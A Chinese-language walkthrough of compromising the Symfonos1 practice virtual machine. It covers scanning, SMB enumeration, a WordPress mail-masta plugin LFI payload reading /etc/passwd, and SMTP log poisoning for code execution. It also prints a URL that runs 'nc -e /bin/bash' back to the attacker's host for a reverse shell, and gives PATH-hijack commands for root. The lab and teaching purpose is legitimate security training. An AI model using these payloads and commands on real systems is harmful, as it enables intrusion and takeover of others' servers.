Symfonos1靶機(jī):Hacking Writeup

Symfonos1 是 Symfonos 系列靶機(jī)的第一關(guān)。

目錄

1、掃描

  • Netdiscover
  • Nmap

2、枚舉

  • SMB 共享目錄
  • WPScan

3、漏洞利用

  • 利用 WordPress 的 LFI 漏洞
  • 通過(guò) SMTP 日志投毒使 LFI 漏洞來(lái)實(shí)現(xiàn) RCE

4、提權(quán)

  • 利用環(huán)境變量 PATH

Let's get it!

使用 netdiscover 命令來(lái)發(fā)現(xiàn)目標(biāo)主機(jī),這里靶機(jī)的 IP192.168.166.201

  • netdiscover -i eth0
image.png

使用 nmap 對(duì)靶機(jī)進(jìn)行端口掃描,發(fā)現(xiàn)開(kāi)放了以下端口:22、25、80、139、445

image.png

接著使用使用 enum4linux 對(duì)靶機(jī)進(jìn)行網(wǎng)絡(luò)枚舉,發(fā)現(xiàn)靶機(jī)存在一個(gè)名為 helios 的用戶(hù),以及兩個(gè) Samba 共享目錄 /anonymous/helios

image.png

訪問(wèn) Samba 共享目錄:

image.png
image.png

先訪問(wèn) /anonymous 目錄,因?yàn)樵撃夸洘o(wú)須輸入密碼即可訪問(wèn):

image.png

查看 attention.txt 文件的內(nèi)容:

image.png

上面提到幾個(gè)弱密碼,可用來(lái)嘗試進(jìn)入 /helios 目錄,嘗試后發(fā)現(xiàn)弱密碼 qwerty 可進(jìn)入 /helios 目錄:

image.png

發(fā)現(xiàn)兩個(gè)文件,research.txttodo.txt ,查看其內(nèi)容,發(fā)現(xiàn) research.txt 沒(méi)啥用,todo.txt 中提到了一個(gè)目錄 /h3l105,這也許是 Web站點(diǎn)的路徑,我們可以嘗試在 Web 中訪問(wèn),于是訪問(wèn) http://192.168.166.201/h3l105/,發(fā)現(xiàn)是一個(gè)使用了 WordPress 搭建的站點(diǎn):

image.png
image.png

對(duì)該站點(diǎn)使用 BurpSuite 抓包可以看到,網(wǎng)站前端向服務(wù)器發(fā)請(qǐng)求的時(shí)候,還會(huì)請(qǐng)求一個(gè)域名 symfonos.local,其實(shí)該域名是就是指向靶機(jī)的 IP,所以我們?cè)诠魴C(jī)的 /etc/hosts 文件中加上該域名的解析記錄:

image.png

然后使用 WPScan 對(duì)其進(jìn)行掃描,加上 -ep 參數(shù),枚舉以下該站點(diǎn)使用的 wordpress 插件:

image.png

發(fā)現(xiàn)使用了 mail-mastasite-editor 這兩個(gè)插件,使用 searchsploit 搜索一下看有沒(méi)有相應(yīng)的 exp

image.png

可以看到 mail-masta 這個(gè)插件的 1.0 版本存在兩個(gè)漏洞,這里我們利用 LFI 漏洞,將 40290.txt 下載下來(lái):

image.png

查看該文件,可看到該漏洞的 PoC 為:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

image.png

于是我們?cè)L問(wèn):
http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

可看到漏洞確實(shí)存在且可被利用:

image.png

因?yàn)榍懊娑丝趻呙璧臅r(shí)候,看到靶機(jī)還開(kāi)放了 25 端口,該端口上運(yùn)行的是 SMTP 郵件服務(wù),所以下面我們通過(guò) SMTP 日志投毒來(lái)使得 LFI 漏洞實(shí)現(xiàn) RCE。

訪問(wèn) http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios 可看到 /var/mail/helios 文件,該郵件記錄的是 helios 用戶(hù)收到的郵件信息。

于是我們可以使用 telnet 通過(guò)命令行向 helios 用戶(hù)發(fā)送郵件,在郵件中插入惡意的 php 代碼:

image.png

發(fā)送后,通過(guò)訪問(wèn) http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&m=id 即可達(dá)到遠(yuǎn)程代碼執(zhí)行的效果

image.png

于是,用這種方式,使用 nc 命令,我們可以拿到一個(gè)反向 shell。

先監(jiān)聽(tīng)本機(jī) 5555 端口:

image.png

訪問(wèn) http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&m=nc%20-e%20/bin/bash%20192.168.166.176%205555

得到反向 shell:

image.png

為了提權(quán),我們先通過(guò) find 命令尋找有 sticky 位的程序文件:

  • find / -perm -u=s -type f 2>/dev/null
image.png

我們選擇其中的 /opt/statuscheck 程序,該文件是一個(gè)二進(jìn)制文件,因此我們使用 strings 命令查看它的元數(shù)據(jù):

image.png

可以看到,該程序會(huì)去調(diào)用 curl 命令。因此我們可以通過(guò)自建一個(gè) curl 命令,并通過(guò)臨時(shí)配置環(huán)境變量 PATH,使得當(dāng) /opt/statuscheck 程序執(zhí)行的時(shí)候,調(diào)用我自建的 curl 命令,從而獲得一個(gè)擁有 root 權(quán)限的 shell。

依次執(zhí)行下面的命令:

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
image.png

這種提權(quán)的方式,可閱讀 Linux Privilege Escalation Using PATH Variable

Hacking done.

image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容